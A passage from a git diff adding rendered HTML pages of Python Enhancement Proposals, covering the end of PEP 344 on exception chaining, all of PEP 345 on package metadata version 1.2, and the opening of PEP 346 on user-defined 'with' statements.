As for other languages, Java and Ruby both discard the original exception when +another exception occurs in a catch/rescue or finally/ensure clause. +Perl 5 lacks built-in structured exception handling. For Perl 6, RFC number +88 [9] proposes an exception mechanism that implicitly retains chained +exceptions in an array named @@. In that RFC, the most recently raised +exception is exposed for matching, as in this PEP; also, arbitrary expressions +(possibly involving @@) can be evaluated for exception matching.

+

Exceptions in C# contain a read-only InnerException property that may +point to another exception. Its documentation [10] says that “When an +exception X is thrown as a direct result of a previous exception Y, the +InnerException property of X should contain a reference to Y.” This +property is not set by the VM automatically; rather, all exception +constructors take an optional innerException argument to set it +explicitly. The __cause__ attribute fulfills the same purpose as +InnerException, but this PEP proposes a new form of raise rather than +extending the constructors of all exceptions. C# also provides a +GetBaseException method that jumps directly to the end of the +InnerException chain; this PEP proposes no analog.

+

The reason all three of these attributes are presented together in one proposal +is that the __traceback__ attribute provides convenient access to the +traceback on chained exceptions.

+
+
+

Implicit Exception Chaining

+

Here is an example to illustrate the __context__ attribute:

+
def compute(a, b):
+    try:
+        a/b
+    except Exception, exc:
+        log(exc)
+
+def log(exc):
+    file = open('logfile.txt')  # oops, forgot the 'w'
+    print >>file, exc
+    file.close()
+
+
+

Calling compute(0, 0) causes a ZeroDivisionError. The compute() +function catches this exception and calls log(exc), but the log() +function also raises an exception when it tries to write to a file that wasn’t +opened for writing.

+

In today’s Python, the caller of compute() gets thrown an IOError. The +ZeroDivisionError is lost. With the proposed change, the instance of +IOError has an additional __context__ attribute that retains the +ZeroDivisionError.

+

The following more elaborate example demonstrates the handling of a mixture of +finally and except clauses:

+
def main(filename):
+    file = open(filename)       # oops, forgot the 'w'
+    try:
+        try:
+            compute()
+        except Exception, exc:
+            log(file, exc)
+        finally:
+            file.clos()         # oops, misspelled 'close'
+
+def compute():
+    1/0
+
+def log(file, exc):
+    try:
+        print >>file, exc       # oops, file is not writable
+    except:
+        display(exc)
+
+def display(exc):
+    print ex                    # oops, misspelled 'exc'
+
+
+

Calling main() with the name of an existing file will trigger four +exceptions. The ultimate result will be an AttributeError due to the +misspelling of clos, whose __context__ points to a NameError due +to the misspelling of ex, whose __context__ points to an IOError +due to the file being read-only, whose __context__ points to a +ZeroDivisionError, whose __context__ attribute is None.

+

The proposed semantics are as follows:

+
    +
  1. Each thread has an exception context initially set to None.
  2. +
  3. Whenever an exception is raised, if the exception instance does not +already have a __context__ attribute, the interpreter sets it equal to +the thread’s exception context.
  4. +
  5. Immediately after an exception is raised, the thread’s exception context is +set to the exception.
  6. +
  7. Whenever the interpreter exits an except block by reaching the end or +executing a return, yield, continue, or break statement, +the thread’s exception context is set to None.
  8. +
+
+
+

Explicit Exception Chaining

+

The __cause__ attribute on exception objects is always initialized to +None. It is set by a new form of the raise statement:

+
raise EXCEPTION from CAUSE
+
+
+

which is equivalent to:

+
exc = EXCEPTION
+exc.__cause__ = CAUSE
+raise exc
+
+
+

In the following example, a database provides implementations for a few +different kinds of storage, with file storage as one kind. The database +designer wants errors to propagate as DatabaseError objects so that the +client doesn’t have to be aware of the storage-specific details, but doesn’t +want to lose the underlying error information:

+
class DatabaseError(StandardError):
+    pass
+
+class FileDatabase(Database):
+    def __init__(self, filename):
+        try:
+            self.file = open(filename)
+        except IOError, exc:
+            raise DatabaseError('failed to open') from exc
+
+
+

If the call to open() raises an exception, the problem will be reported as +a DatabaseError, with a __cause__ attribute that reveals the +IOError as the original cause.

+
+
+

Traceback Attribute

+

The following example illustrates the __traceback__ attribute:

+
def do_logged(file, work):
+    try:
+        work()
+    except Exception, exc:
+        write_exception(file, exc)
+        raise exc
+
+from traceback import format_tb
+
+def write_exception(file, exc):
+    ...
+    type = exc.__class__
+    message = str(exc)
+    lines = format_tb(exc.__traceback__)
+    file.write(... type ... message ... lines ...)
+    ...
+
+
+

In today’s Python, the do_logged() function would have to extract the +traceback from sys.exc_traceback or sys.exc_info() [2] and pass both +the value and the traceback to write_exception(). With the proposed +change, write_exception() simply gets one argument and obtains the +exception using the __traceback__ attribute.

+

The proposed semantics are as follows:

+
    +
  1. Whenever an exception is caught, if the exception instance does not already +have a __traceback__ attribute, the interpreter sets it to the newly +caught traceback.
  2. +
+
+
+

Enhanced Reporting

+

The default exception handler will be modified to report chained exceptions. +The chain of exceptions is traversed by following the __cause__ and +__context__ attributes, with __cause__ taking priority. In keeping +with the chronological order of tracebacks, the most recently raised exception +is displayed last; that is, the display begins with the description of the +innermost exception and backs up the chain to the outermost exception. The +tracebacks are formatted as usual, with one of the lines:

+
The above exception was the direct cause of the following exception:
+
+
+

or

+
During handling of the above exception, another exception occurred:
+
+
+

between tracebacks, depending whether they are linked by __cause__ or +__context__ respectively. Here is a sketch of the procedure:

+
def print_chain(exc):
+    if exc.__cause__:
+        print_chain(exc.__cause__)
+        print '\nThe above exception was the direct cause...'
+    elif exc.__context__:
+        print_chain(exc.__context__)
+        print '\nDuring handling of the above exception, ...'
+    print_exc(exc)
+
+
+

In the traceback module, the format_exception, print_exception, +print_exc, and print_last functions will be updated to accept an +optional chain argument, True by default. When this argument is +True, these functions will format or display the entire chain of +exceptions as just described. When it is False, these functions will +format or display only the outermost exception.

+

The cgitb module should also be updated to display the entire chain of +exceptions.

+
+
+

C API

+

The PyErr_Set* calls for setting exceptions will not set the +__context__ attribute on exceptions. PyErr_NormalizeException will +always set the traceback attribute to its tb argument and the +__context__ and __cause__ attributes to None.

+

A new API function, PyErr_SetContext(context), will help C programmers +provide chained exception information. This function will first normalize the +current exception so it is an instance, then set its __context__ +attribute. A similar API function, PyErr_SetCause(cause), will set the +__cause__ attribute.

+
+
+

Compatibility

+

Chained exceptions expose the type of the most recent exception, so they will +still match the same except clauses as they do now.

+

The proposed changes should not break any code unless it sets or uses +attributes named __context__, __cause__, or __traceback__ on +exception instances. As of 2005-05-12, the Python standard library contains +no mention of such attributes.

+
+
+

Open Issue: Extra Information

+

Walter Dörwald [11] expressed a desire to attach extra information to an +exception during its upward propagation without changing its type. This could +be a useful feature, but it is not addressed by this PEP. It could +conceivably be addressed by a separate PEP establishing conventions for other +informational attributes on exceptions.

+
+
+

Open Issue: Suppressing Context

+

As written, this PEP makes it impossible to suppress __context__, since +setting exc.__context__ to None in an except or finally clause +will only result in it being set again when exc is raised.

+
+
+

Open Issue: Limiting Exception Types

+

To improve encapsulation, library implementors may want to wrap all +implementation-level exceptions with an application-level exception. One could +try to wrap exceptions by writing this:

+
try:
+    ... implementation may raise an exception ...
+except:
+    import sys
+    raise ApplicationError from sys.exc_value
+
+
+

or this

+
try:
+    ... implementation may raise an exception ...
+except Exception, exc:
+    raise ApplicationError from exc
+
+
+

but both are somewhat flawed. It would be nice to be able to name the current +exception in a catch-all except clause, but that isn’t addressed here. +Such a feature would allow something like this:

+
try:
+    ... implementation may raise an exception ...
+except *, exc:
+    raise ApplicationError from exc
+
+
+
+
+

Open Issue: yield

+

The exception context is lost when a yield statement is executed; resuming +the frame after the yield does not restore the context. Addressing this +problem is out of the scope of this PEP; it is not a new problem, as +demonstrated by the following example:

+
>>> def gen():
+...     try:
+...         1/0
+...     except:
+...         yield 3
+...         raise
+...
+>>> g = gen()
+>>> g.next()
+3
+>>> g.next()
+TypeError: exceptions must be classes, instances, or strings
+(deprecated), not NoneType
+
+
+
+
+

Open Issue: Garbage Collection

+

The strongest objection to this proposal has been that it creates cycles +between exceptions and stack frames [12]. Collection of cyclic garbage (and +therefore resource release) can be greatly delayed:

+
>>> try:
+>>>     1/0
+>>> except Exception, err:
+>>>     pass
+
+
+

will introduce a cycle from err -> traceback -> stack frame -> err, keeping +all locals in the same scope alive until the next GC happens.

+

Today, these locals would go out of scope. There is lots of code which +assumes that “local” resources – particularly open files – will be closed +quickly. If closure has to wait for the next GC, a program (which runs fine +today) may run out of file handles.

+

Making the __traceback__ attribute a weak reference would avoid the +problems with cyclic garbage. Unfortunately, it would make saving the +Exception for later (as unittest does) more awkward, and it would not +allow as much cleanup of the sys module.

+

A possible alternate solution, suggested by Adam Olsen, would be to instead +turn the reference from the stack frame to the err variable into a weak +reference when the variable goes out of scope [13].

+
+
+

Possible Future Compatible Changes

+

These changes are consistent with the appearance of exceptions as a single +object rather than a triple at the interpreter level.

+
    +
  • If PEP 340 or PEP 343 is accepted, replace the three (type, value, +traceback) arguments to __exit__ with a single exception argument.
  • +
  • Deprecate sys.exc_type, sys.exc_value, sys.exc_traceback, and +sys.exc_info() in favour of a single member, sys.exception.
  • +
  • Deprecate sys.last_type, sys.last_value, and sys.last_traceback +in favour of a single member, sys.last_exception.
  • +
  • Deprecate the three-argument form of the raise statement in favour of +the one-argument form.
  • +
  • Upgrade cgitb.html() to accept a single value as its first argument as +an alternative to a (type, value, traceback) tuple.
  • +
+
+
+

Possible Future Incompatible Changes

+

These changes might be worth considering for Python 3000.

+
    +
  • Remove sys.exc_type, sys.exc_value, sys.exc_traceback, and +sys.exc_info().
  • +
  • Remove sys.last_type, sys.last_value, and sys.last_traceback.
  • +
  • Replace the three-argument sys.excepthook with a one-argument API, and +changing the cgitb module to match.
  • +
  • Remove the three-argument form of the raise statement.
  • +
  • Upgrade traceback.print_exception to accept an exception argument +instead of the type, value, and traceback arguments.
  • +
+
+
+

Acknowledgements

+

Brett Cannon, Greg Ewing, Guido van Rossum, Jeremy Hylton, Phillip J. Eby, +Raymond Hettinger, Walter Dörwald, and others.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0344.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0345/index.html b/pep-0345/index.html new file mode 100644 index 00000000000..aec704819ae --- /dev/null +++ b/pep-0345/index.html @@ -0,0 +1,670 @@ + + + + + + + + PEP 345 – Metadata for Python Software Packages 1.2 | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 345 – Metadata for Python Software Packages 1.2

+
+
Author:
+
Richard Jones <richard at python.org>
+
Discussions-To:
+
Distutils-SIG list
+
Status:
+
Superseded
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
28-Apr-2005
+
Python-Version:
+
2.7
+
Post-History:
+
22-Dec-2009
+
Replaces:
+
314
+
Superseded-By:
+
566
+
Resolution:
+
Python-Dev thread
+
+
+
+
Table of Contents +
+
+

Attention

+

This PEP is a historical document. The up-to-date, canonical spec, Core metadata specifications, is maintained on the PyPA specs page.

+

×

+

See the PyPA specification update process for how to propose changes.

+
+
+

Abstract

+

This PEP describes a mechanism for adding metadata to Python distributions. +It includes specifics of the field names, and their semantics and +usage.

+

This document specifies version 1.2 of the metadata format. +Version 1.0 is specified in PEP 241. +Version 1.1 is specified in PEP 314.

+

Version 1.2 of the metadata format adds a number of optional fields +designed to make third-party packaging of Python Software easier. +These fields are “Requires-Python”, “Requires-External”, “Requires-Dist”, +“Provides-Dist”, and “Obsoletes-Dist”. This version also changes the +“Platform” field. Three new fields were also added: “Maintainer”, +“Maintainer-email” and “Project-URL”.

+

Last, this new version also adds environment markers.

+
+
+

Fields

+

This section specifies the names and semantics of each of the +supported metadata fields.

+

Fields marked with “(Multiple use)” may be specified multiple +times in a single PKG-INFO file. Other fields may only occur +once in a PKG-INFO file. Fields marked with “(optional)” are +not required to appear in a valid PKG-INFO file; all other +fields must be present.

+
+

Metadata-Version

+

Version of the file format; “1.2” is the only legal value.

+

Example:

+
Metadata-Version: 1.2
+
+
+
+
+

Name

+

The name of the distributions.

+

Example:

+
Name: BeagleVote
+
+
+
+
+

Version

+

A string containing the distribution’s version number. This +field must be in the format specified in PEP 440.

+

Example:

+
Version: 1.0a2
+
+
+
+
+

Platform (multiple use)

+

A Platform specification describing an operating system supported by +the distribution which is not listed in the “Operating System” Trove classifiers. +See “Classifier” below.

+

Examples:

+
Platform: ObscureUnix
+Platform: RareDOS
+
+
+
+
+

Supported-Platform (multiple use)

+

Binary distributions containing a PKG-INFO file will use the +Supported-Platform field in their metadata to specify the OS and +CPU for which the binary distribution was compiled. The semantics of +the Supported-Platform field are not specified in this PEP.

+

Example:

+
Supported-Platform: RedHat 7.2
+Supported-Platform: i386-win32-2791
+
+
+
+
+

Summary

+

A one-line summary of what the distribution does.

+

Example:

+
Summary: A module for collecting votes from beagles.
+
+
+
+
+

Description (optional)

+

A longer description of the distribution that can run to several +paragraphs. Software that deals with metadata should not assume +any maximum size for this field, though people shouldn’t include +their instruction manual as the description.

+

The contents of this field can be written using reStructuredText +markup [1]. For programs that work with the metadata, supporting +markup is optional; programs can also display the contents of the +field as-is. This means that authors should be conservative in +the markup they use.

+

To support empty lines and lines with indentation with respect to +the RFC 822 format, any CRLF character has to be suffixed by 7 spaces +followed by a pipe (“|”) char. As a result, the Description field is +encoded into a folded field that can be interpreted by RFC 822#section-3.1.1 +parser.

+

Example:

+
Description: This project provides powerful math functions
+        |For example, you can use ``sum()`` to sum numbers:
+        |
+        |Example::
+        |
+        |    >>> sum(1, 2)
+        |    3
+        |
+
+
+

This encoding implies that any occurrences of a CRLF followed by 7 spaces +and a pipe char have to be replaced by a single CRLF when the field is unfolded +using a RFC 822 reader.

+
+
+

Keywords (optional)

+

A list of additional keywords to be used to assist searching +for the distribution in a larger catalog.

+

Example:

+
Keywords: dog puppy voting election
+
+
+
+
+

Home-page (optional)

+

A string containing the URL for the distribution’s home page.

+

Example:

+
Home-page: http://www.example.com/~cschultz/bvote/
+
+
+
+
+

Download-URL

+

A string containing the URL from which this version of the distribution +can be downloaded. (This means that the URL can’t be something like +“…/BeagleVote-latest.tgz”, but instead must be “…/BeagleVote-0.45.tgz”.)

+
+
+

Author (optional)

+

A string containing the author’s name at a minimum; additional +contact information may be provided.

+

Example:

+
Author: C. Schultz, Universal Features Syndicate,
+        Los Angeles, CA <cschultz@peanuts.example.com>
+
+
+
+
+

Author-email (optional)

+

A string containing the author’s e-mail address. It can contain +a name and e-mail address in the legal forms for a RFC 822 +From: header.

+

Example:

+
Author-email: "C. Schultz" <cschultz@example.com>
+
+
+
+
+

Maintainer (optional)

+

A string containing the maintainer’s name at a minimum; additional +contact information may be provided.

+

Note that this field is intended for use when a project is being +maintained by someone other than the original author: it should be +omitted if it is identical to Author.

+

Example:

+
Maintainer: C. Schultz, Universal Features Syndicate,
+        Los Angeles, CA <cschultz@peanuts.example.com>
+
+
+
+
+

Maintainer-email (optional)

+

A string containing the maintainer’s e-mail address. It can contain +a name and e-mail address in the legal forms for a RFC 822 +From: header.

+

Note that this field is intended for use when a project is being +maintained by someone other than the original author: it should be +omitted if it is identical to Author-email.

+

Example:

+
Maintainer-email: "C. Schultz" <cschultz@example.com>
+
+
+
+
+

License (optional)

+

Text indicating the license covering the distribution where the license +is not a selection from the “License” Trove classifiers. See +“Classifier” below. This field may also be used to specify a +particular version of a license which is named via the Classifier +field, or to indicate a variation or exception to such a license.

+

Examples:

+
License: This software may only be obtained by sending the
+        author a postcard, and then the user promises not
+        to redistribute it.
+
+License: GPL version 3, excluding DRM provisions
+
+
+
+
+

Classifier (multiple use)

+

Each entry is a string giving a single classification value +for the distribution. Classifiers are described in PEP 301.

+

Examples:

+
Classifier: Development Status :: 4 - Beta
+Classifier: Environment :: Console (Text Based)
+
+
+
+
+

Requires-Dist (multiple use)

+

Each entry contains a string naming some other distutils +project required by this distribution.

+

The format of a requirement string is identical to that of a +distutils project name (e.g., as found in the Name: field. +optionally followed by a version declaration within parentheses.

+

The distutils project names should correspond to names as found +on the Python Package Index.

+

Version declarations must follow the rules described in +Version Specifiers

+

Examples:

+
Requires-Dist: pkginfo
+Requires-Dist: PasteDeploy
+Requires-Dist: zope.interface (>3.5.0)
+
+
+
+
+

Provides-Dist (multiple use)

+

Each entry contains a string naming a Distutils project which +is contained within this distribution. This field must include +the project identified in the Name field, followed by the +version : Name (Version).

+

A distribution may provide additional names, e.g. to indicate that +multiple projects have been bundled together. For instance, source +distributions of the ZODB project have historically included +the transaction project, which is now available as a separate +distribution. Installing such a source distribution satisfies +requirements for both ZODB and transaction.

+

A distribution may also provide a “virtual” project name, which does +not correspond to any separately-distributed project: such a name +might be used to indicate an abstract capability which could be supplied +by one of multiple projects. E.g., multiple projects might supply +RDBMS bindings for use by a given ORM: each project might declare +that it provides ORM-bindings, allowing other projects to depend +only on having at most one of them installed.

+

A version declaration may be supplied and must follow the rules described +in Version Specifiers. The distribution’s version number will be implied +if none is specified.

+

Examples:

+
Provides-Dist: OtherProject
+Provides-Dist: AnotherProject (3.4)
+Provides-Dist: virtual_package
+
+
+
+
+

Obsoletes-Dist (multiple use)

+

Each entry contains a string describing a distutils project’s distribution +which this distribution renders obsolete, meaning that the two projects +should not be installed at the same time.

+

Version declarations can be supplied. Version numbers must be in the +format specified in Version Specifiers.

+

The most common use of this field will be in case a project name +changes, e.g. Gorgon 2.3 gets subsumed into Torqued Python 1.0. +When you install Torqued Python, the Gorgon distribution should be +removed.

+

Examples:

+
Obsoletes-Dist: Gorgon
+Obsoletes-Dist: OtherProject (<3.0)
+
+
+
+
+

Requires-Python

+

This field specifies the Python version(s) that the distribution is +guaranteed to be compatible with.

+

Version numbers must be in the format specified in Version Specifiers.

+

Examples:

+
Requires-Python: 2.5
+Requires-Python: >2.1
+Requires-Python: >=2.3.4
+Requires-Python: >=2.5,<2.7
+
+
+
+
+

Requires-External (multiple use)

+

Each entry contains a string describing some dependency in the +system that the distribution is to be used. This field is intended to +serve as a hint to downstream project maintainers, and has no +semantics which are meaningful to the distutils distribution.

+

The format of a requirement string is a name of an external +dependency, optionally followed by a version declaration within +parentheses.

+

Because they refer to non-Python software releases, version numbers +for this field are not required to conform to the format +specified in PEP 440: they should correspond to the +version scheme used by the external dependency.

+

Notice that there’s is no particular rule on the strings to be used.

+

Examples:

+
Requires-External: C
+Requires-External: libpng (>=1.5)
+
+
+
+
+

Project-URL (multiple-use)

+

A string containing an extra URL for the project and a label for it, +separated by a comma. This should be used when there are other URLs +to list in the metadata in addition to the “Home-page” field.

+

Examples:

+
Project-URL: Bug Tracker, https://github.com/pypa/setuptools/issues
+Project-URL: Documentation, https://setuptools.readthedocs.io/
+Project-URL: Funding, https://donate.pypi.org
+
+
+

The label is free text, with a maximum length of 32 characters. Notice +that distributions uploaded to PyPI will have these extra entries +displayed under the “Project links” section of their landing page.

+
+
+
+

Version Specifiers

+

Version specifiers are a series of conditional operators and +version numbers, separated by commas. Conditional operators +must be one of “<”, “>”, “<=”, “>=”, “==” and “!=”.

+

Any number of conditional operators can be specified, e.g. +the string “>1.0, !=1.3.4, <2.0” is a legal version declaration. +The comma (“,”) is equivalent to the and operator.

+

Each version number must be in the format specified in PEP 440.

+

When a version is provided, it always includes all versions that +starts with the same value. For example, the “2.5” version of Python +will include versions like “2.5.2” or “2.5.3”. Pre and post releases +in that case are excluded. So in our example, versions like “2.5a1” are +not included when “2.5” is used. If the first version of the range is +required, it has to be explicitly given. In our example, it will be +“2.5.0”.

+

Notice that some projects might omit the “.0” suffix for the first release +of the “2.5.x” series:

+
    +
  • 2.5
  • +
  • 2.5.1
  • +
  • 2.5.2
  • +
  • etc.
  • +
+

In that case, “2.5.0” will have to be explicitly used to avoid any confusion +between the “2.5” notation that represents the full range. It is a recommended +practice to use schemes of the same length for a series to completely avoid +this problem.

+

Some Examples:

+
    +
  • Requires-Dist: zope.interface (3.1): any version that starts with 3.1, +excluding post or pre-releases.
  • +
  • Requires-Dist: zope.interface (3.1.0): any version that starts with +3.1.0, excluding post or pre-releases. Since that particular project doesn’t +use more than 3 digits, it also means “only the 3.1.0 release”.
  • +
  • Requires-Python: 3: Any Python 3 version, no matter which one, excluding +post or pre-releases.
  • +
  • Requires-Python: >=2.6,<3: Any version of Python 2.6 or 2.7, including +post releases of 2.6, pre and post releases of 2.7. It excludes pre releases +of Python 3.
  • +
  • Requires-Python: 2.6.2: Equivalent to “>=2.6.2,<2.6.3”. So this includes +only Python 2.6.2. Of course, if Python was numbered with 4 digits, it would +have include all versions of the 2.6.2 series.
  • +
  • Requires-Python: 2.5.0: Equivalent to “>=2.5.0,<2.5.1”.
  • +
  • Requires-Dist: zope.interface (3.1,!=3.1.3): any version that starts with +3.1, excluding post or pre-releases of 3.1 and excluding any version that +starts with “3.1.3”. For this particular project, this means: “any version +of the 3.1 series but not 3.1.3”. This is equivalent to: +“>=3.1,!=3.1.3,<3.2”.
  • +
+
+
+

Environment markers

+

An environment marker is a marker that can be added at the end of a +field after a semi-colon (“;”), to add a condition about the execution +environment.

+

Here are some example of fields using such markers:

+
Requires-Dist: pywin32 (>1.0); sys.platform == 'win32'
+Obsoletes-Dist: pywin31; sys.platform == 'win32'
+Requires-Dist: foo (1,!=1.3); platform.machine == 'i386'
+Requires-Dist: bar; python_version == '2.4' or python_version == '2.5'
+Requires-External: libxslt; 'linux' in sys.platform
+
+
+

The micro-language behind this is the simplest possible: it compares only +strings, with the == and in operators (and their opposites), and +with the ability to combine expressions. It makes it also easy to understand +to non-pythoneers.

+

The pseudo-grammar is

+
EXPR [in|==|!=|not in] EXPR [or|and] ...
+
+
+

where EXPR belongs to any of those:

+
    +
  • python_version = ‘%s.%s’ % (sys.version_info[0], sys.version_info[1])
  • +
  • python_full_version = sys.version.split()[0]
  • +
  • os.name = os.name
  • +
  • sys.platform = sys.platform
  • +
  • platform.version = platform.version()
  • +
  • platform.machine = platform.machine()
  • +
  • platform.python_implementation = platform.python_implementation()
  • +
  • a free string, like '2.4', or 'win32'
  • +
+

Notice that in is restricted to strings, meaning that it is not possible +to use other sequences like tuples or lists on the right side.

+

The fields that benefit from this marker are:

+
    +
  • Requires-External
  • +
  • Requires-Dist
  • +
  • Provides-Dist
  • +
  • Obsoletes-Dist
  • +
  • Classifier
  • +
+
+
+

Summary of Differences From PEP 314

+
    +
  • Metadata-Version is now 1.2.
  • +
  • Added the environment markers.
  • +
  • Changed fields:
      +
    • Platform (syntax change)
    • +
    • Author-email (change to optional field)
    • +
    +
  • +
  • Added fields:
      +
    • Maintainer
    • +
    • Maintainer-email
    • +
    • Requires-Python
    • +
    • Requires-External
    • +
    • Requires-Dist
    • +
    • Provides-Dist
    • +
    • Obsoletes-Dist
    • +
    • Project-URL
    • +
    +
  • +
  • Deprecated fields:
      +
    • Requires (in favor of Requires-Dist)
    • +
    • Provides (in favor of Provides-Dist)
    • +
    • Obsoletes (in favor of Obsoletes-Dist)
    • +
    +
  • +
+
+
+

References

+

This document specifies version 1.2 of the metadata format. +Version 1.0 is specified in PEP 241. +Version 1.1 is specified in PEP 314.

+ +
+ +
+

Acknowledgements

+

Fred Drake, Anthony Baxter and Matthias Klose have all contributed to +the ideas presented in this PEP.

+

Tres Seaver, Jim Fulton, Marc-André Lemburg, Martin von Löwis, Tarek Ziadé, +David Lyon and other people at the Distutils-SIG have contributed to the +new updated version.

+
+
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0345.rst

+

Last modified: 2024-10-06 16:27:00 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0346/index.html b/pep-0346/index.html new file mode 100644 index 00000000000..99f169b7bed --- /dev/null +++ b/pep-0346/index.html @@ -0,0 +1,1375 @@ + + + + + + + + PEP 346 – User Defined (”with”) Statements | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 346 – User Defined (”with”) Statements

+
+
Author:
+
Alyssa Coghlan <ncoghlan at gmail.com>
+
Status:
+
Withdrawn
+
Type:
+
Standards Track
+
Created:
+
06-May-2005
+
Python-Version:
+
2.5
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP is a combination of PEP 310’s “Reliable Acquisition/Release +Pairs” with the “Anonymous Block Statements” of Guido’s PEP 340. This +PEP aims to take the good parts of PEP 340, blend them with parts of +PEP 310 and rearrange the lot into an elegant whole. It borrows from +various other PEPs in order to paint a complete picture, and is +intended to stand on its own.

+
+
+

Author’s Note

+

During the discussion of PEP 340, I maintained drafts of this PEP as +PEP 3XX on my own website (since I didn’t have CVS access to update a +submitted PEP fast enough to track the activity on python-dev).

+

Since the first draft of this PEP, Guido wrote PEP 343 as a simplified +version of PEP 340. PEP 343 (at the time of writing) uses the exact +same semantics for the new statements as this PEP, but uses a slightly +different mechanism to allow generators to be used to write statement +templates. However, Guido has indicated that he intends to accept a +new PEP being written by Raymond Hettinger that will integrate PEP 288 +and PEP 325, and will permit a generator decorator like the one +described in this PEP to be used to write statement templates for PEP +343. The other difference was the choice of keyword (‘with’ versus +‘do’) and Guido has stated he will organise a vote on that in the +context of PEP 343.

+

Accordingly, the version of this PEP submitted for archiving on +python.org is to be WITHDRAWN immediately after submission. PEP 343 +and the combined generator enhancement PEP will cover the important +ideas.

+
+
+

Introduction

+

This PEP proposes that Python’s ability to reliably manage resources +be enhanced by the introduction of a new with statement that +allows factoring out of arbitrary try/finally and some +try/except/else boilerplate. The new construct is called +a ‘user defined statement’, and the associated class definitions are +called ‘statement templates’.

+

The above is the main point of the PEP. However, if that was all it +said, then PEP 310 would be sufficient and this PEP would be +essentially redundant. Instead, this PEP recommends additional +enhancements that make it natural to write these statement templates +using appropriately decorated generators. A side effect of those +enhancements is that it becomes important to appropriately deal +with the management of resources inside generators.

+

This is quite similar to PEP 343, but the exceptions that occur are +re-raised inside the generators frame, and the issue of generator +finalisation needs to be addressed as a result. The template +generator decorator suggested by this PEP also creates reusable +templates, rather than the single use templates of PEP 340.

+

In comparison to PEP 340, this PEP eliminates the ability to suppress +exceptions, and makes the user defined statement a non-looping +construct. The other main difference is the use of a decorator to +turn generators into statement templates, and the incorporation of +ideas for addressing iterator finalisation.

+

If all that seems like an ambitious operation… well, Guido was the +one to set the bar that high when he wrote PEP 340 :)

+
+
+

Relationship with other PEPs

+

This PEP competes directly with PEP 310, PEP 340 and PEP 343, +as those PEPs all describe alternative mechanisms for handling +deterministic resource management.

+

It does not compete with PEP 342 which splits off PEP 340’s +enhancements related to passing data into iterators. The associated +changes to the for loop semantics would be combined with the +iterator finalisation changes suggested in this PEP. User defined +statements would not be affected.

+

Neither does this PEP compete with the generator enhancements +described in PEP 288. While this PEP proposes the ability to +inject exceptions into generator frames, it is an internal +implementation detail, and does not require making that ability +publicly available to Python code. PEP 288 is, in part, about +making that implementation detail easily accessible.

+

This PEP would, however, make the generator resource release support +described in PEP 325 redundant - iterators which require +finalisation should provide an appropriate implementation of the +statement template protocol.

+
+
+

User defined statements

+

To steal the motivating example from PEP 310, correct handling of a +synchronisation lock currently looks like this:

+
the_lock.acquire()
+try:
+    # Code here executes with the lock held
+finally:
+    the_lock.release()
+
+
+

Like PEP 310, this PEP proposes that such code be able to be written +as:

+
with the_lock:
+    # Code here executes with the lock held
+
+
+

These user defined statements are primarily designed to allow easy +factoring of try blocks that are not easily converted to +functions. This is most commonly the case when the exception handling +pattern is consistent, but the body of the try block changes. +With a user-defined statement, it is straightforward to factor out the +exception handling into a statement template, with the body of the +try clause provided inline in the user code.

+

The term ‘user defined statement’ reflects the fact that the meaning +of a with statement is governed primarily by the statement +template used, and programmers are free to create their own statement +templates, just as they are free to create their own iterators for use +in for loops.

+
+

Usage syntax for user defined statements

+

The proposed syntax is simple:

+
with EXPR1 [as VAR1]:
+    BLOCK1
+
+
+
+
+

Semantics for user defined statements

+
the_stmt = EXPR1
+stmt_enter = getattr(the_stmt, "__enter__", None)
+stmt_exit = getattr(the_stmt, "__exit__", None)
+if stmt_enter is None or stmt_exit is None:
+    raise TypeError("Statement template required")
+
+VAR1 = stmt_enter() # Omit 'VAR1 =' if no 'as' clause
+exc = (None, None, None)
+try:
+    try:
+        BLOCK1
+    except:
+        exc = sys.exc_info()
+        raise
+finally:
+    stmt_exit(*exc)
+
+
+

Other than VAR1, none of the local variables shown above will be +visible to user code. Like the iteration variable in a for loop, +VAR1 is visible in both BLOCK1 and code following the user +defined statement.

+

Note that the statement template can only react to exceptions, it +cannot suppress them. See Rejected Options for an explanation as +to why.

+
+
+

Statement template protocol: __enter__

+

The __enter__() method takes no arguments, and if it raises an +exception, BLOCK1 is never executed. If this happens, the +__exit__() method is not called. The value returned by this +method is assigned to VAR1 if the as clause is used. Object’s +with no other value to return should generally return self rather +than None to permit in-place creation in the with statement.

+

Statement templates should use this method to set up the conditions +that are to exist during execution of the statement (e.g. acquisition +of a synchronisation lock).

+

Statement templates which are not always usable (e.g. closed file +objects) should raise a RuntimeError if an attempt is made to call +__enter__() when the template is not in a valid state.

+
+
+

Statement template protocol: __exit__

+

The __exit__() method accepts three arguments which correspond to +the three “arguments” to the raise statement: type, value, and +traceback. All arguments are always supplied, and will be set to +None if no exception occurred. This method will be called exactly +once by the with statement machinery if the __enter__() method +completes successfully.

+

Statement templates perform their exception handling in this method. +If the first argument is None, it indicates non-exceptional +completion of BLOCK1 - execution either reached the end of block, +or early completion was forced using a return, break or +continue statement. Otherwise, the three arguments reflect the +exception that terminated BLOCK1.

+

Any exceptions raised by the __exit__() method are propagated to +the scope containing the with statement. If the user code in +BLOCK1 also raised an exception, that exception would be lost, and +replaced by the one raised by the __exit__() method.

+
+
+

Factoring out arbitrary exception handling

+

Consider the following exception handling arrangement:

+
SETUP_BLOCK
+try:
+    try:
+        TRY_BLOCK
+    except exc_type1, exc:
+        EXCEPT_BLOCK1
+    except exc_type2, exc:
+        EXCEPT_BLOCK2
+    except:
+        EXCEPT_BLOCK3
+    else:
+        ELSE_BLOCK
+finally:
+    FINALLY_BLOCK
+
+
+

It can be roughly translated to a statement template as follows:

+
class my_template(object):
+
+    def __init__(self, *args):
